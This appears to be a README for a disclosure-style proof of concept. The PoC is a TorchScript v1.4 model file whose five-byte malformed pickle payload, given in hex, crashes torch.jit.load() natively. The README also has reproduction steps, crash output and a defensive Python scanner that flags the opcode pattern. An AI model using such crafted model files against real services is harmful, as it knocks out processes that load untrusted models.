---
tags:
- torchscript
- pytorch
- security
- dos
- poc
license: bsd-3-clause
---

# TorchScript v1.4 JIT Unpickler Native DoS PoC

This is a benign proof of concept for a TorchScript v1.4 load-time native denial of service.

The artifact `artifacts/underflow_appends.pt` is a minimal TorchScript ZIP archive with a malformed `constants.pkl` payload:

```text
80 02 5d 65 2e
PROTO 2, EMPTY_LIST, APPENDS, STOP
```

In PyTorch `1.4.0`, `torch.jit.load()` reaches the JIT unpickler and crashes natively on this malformed pickle opcode sequence. Current PyTorch versions tested locally return clean parser errors instead, so this report is specifically scoped to TorchScript v1.4.

## Reproduction

Use a Python environment with PyTorch `1.4.0` installed:

```bash
python verify_torchscript_v14_dos.py --python /path/to/python-with-torch-1.4.0
```

Expected output includes a native-crash return code:

```json
{
  "returncode": -11,
  "native_crash": true
}
```

Depending on the shell/platform, SIGSEGV may also appear as exit code `139`; SIGABRT variants appear as `134`.

## Impact

An attacker-controlled TorchScript v1.4 model file can crash a process that calls `torch.jit.load()` on the artifact. This is a model-file-carried denial of service. It is not arbitrary code execution and no controlled memory-corruption primitive is claimed.

Severity estimate: Medium, if TorchScript v1.4 is in scope. This is weaker if only current PyTorch versions are accepted.

## Evidence

Included evidence:

- `evidence/torch_1_4_matrix.txt`: PyTorch `1.4.0` crash matrix for malformed `constants.pkl` variants.
- `evidence/current_torch_2_8_matrix_nomemlimit.txt`: current-version comparison showing clean parser errors.
- `evidence/modelscan_0_8_8_underflow_appends.json`: ModelScan 0.8.8 output, zero issues while scanning `ts/constants.pkl`.

## Hashes

```text
bd34cabfd35feb96ced8a63489c5899aa9b17c000ce552406519998d5d3855f1  artifacts/underflow_appends.pt
```

## Limitation

This is intentionally version-scoped. It should be submitted only to programs that accept TorchScript v1.4 or old-version model-format DoS findings.
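
A pre-load structural check for the opcode sequence shown above (`APPENDS` with no open `MARK`), as an added example that is not part of this PoC's own scripts. It walks each `.pkl` member with the standard-library `pickletools.genops`, never unpickles anything, and tracks only MARK depth, so it is not a full pickle validator. The function names, the `ts/data.pkl` member and the sample archive are constructed for illustration.

```python
import io
import pickletools
import zipfile

# Constructed samples: the page's 5-byte payload and a well-formed variant
# (PROTO 2, EMPTY_LIST, MARK, BININT1 1, APPENDS, STOP).
MALFORMED = bytes.fromhex("80025d652e")
WELL_FORMED = bytes.fromhex("80025d284b01652e")


def mark_underflows(payload: bytes):
    """Return (offset, opcode) for each opcode that needs a MARK when none is open."""
    open_marks, findings = 0, []
    try:
        for op, _arg, pos in pickletools.genops(payload):
            if op.name == "MARK":
                open_marks += 1
            elif pickletools.markobject in op.stack_before:
                if open_marks == 0:
                    findings.append((pos, op.name))
                else:
                    open_marks -= 1
    except Exception as exc:  # unknown opcode or truncated argument
        findings.append((-1, f"parse error: {exc}"))
    return findings


def scan_archive(data: bytes):
    """Map each flagged *.pkl member of an in-memory ZIP to its findings."""
    flagged = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if name.endswith(".pkl"):
                hits = mark_underflows(zf.read(name))
                if hits:
                    flagged[name] = hits
    return flagged


def build_sample() -> bytes:
    """Constructed stand-in archive; not the PoC artifact itself."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("ts/constants.pkl", MALFORMED)
        zf.writestr("ts/data.pkl", WELL_FORMED)
    return buf.getvalue()


if __name__ == "__main__":
    print(scan_archive(build_sample()))
```

Running a check like this in a separate process before `torch.jit.load()` lets a service reject the file without exposing the loader to it.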